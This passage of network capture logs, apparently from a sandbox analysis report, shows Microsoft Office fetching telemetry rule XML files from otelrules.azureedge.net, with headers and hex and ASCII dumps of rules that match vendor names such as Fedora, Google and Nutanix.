                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            50192.168.2.44980213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                            x-ms-request-id: a93e4d9c-801e-0015-6aa4-26f97f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-r1755647c66qg7mpa8m0fzcvy000000006k0000000009k92
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            51192.168.2.44980413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                            x-ms-request-id: 64bb7fc7-f01e-0071-5d6f-28431c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-17fbfdc98bbl4n669ut4r27e080000000540000000001t1p
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            52192.168.2.44980513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                            x-ms-request-id: 0697abc8-001e-00ad-714f-28554b000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-r1755647c66kcsqh9hy6eyp6kw00000003q0000000003rbx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            53192.168.2.44980613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                            x-ms-request-id: ba54a096-301e-0020-3719-266299000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-17fbfdc98bbh7l5skzh3rekksc00000006w0000000000vzb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            54192.168.2.44980713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                            x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-17fbfdc98bbjwdgn5g1mr5hcxn00000003ag000000005are
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:28 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            55192.168.2.44980813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                            x-ms-request-id: a8de1b79-001e-0017-5ba3-260c3c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-r1755647c664nptf1txg2psens000000045000000000ench
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            56192.168.2.44980913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:28 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                            x-ms-request-id: 7fcc546d-701e-001e-80a3-21f5e6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-r1755647c66hbclz9tgqkaxg2w00000006wg00000000dxxx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:28 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            57192.168.2.44981013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:28 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                            x-ms-request-id: ecde688c-a01e-0002-2807-275074000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-17fbfdc98bb2xwflv0w9dps90c000000068g000000006c7y
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            58192.168.2.44981113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:28 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                            x-ms-request-id: 962e216e-b01e-0070-5bcb-261cc0000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-17fbfdc98bb6vp4m3kc0kte9cs000000068g0000000018f5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            59192.168.2.44981213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:29 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                            x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c66hxv26qums8q8fsw00000003fg00000000bt2n
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
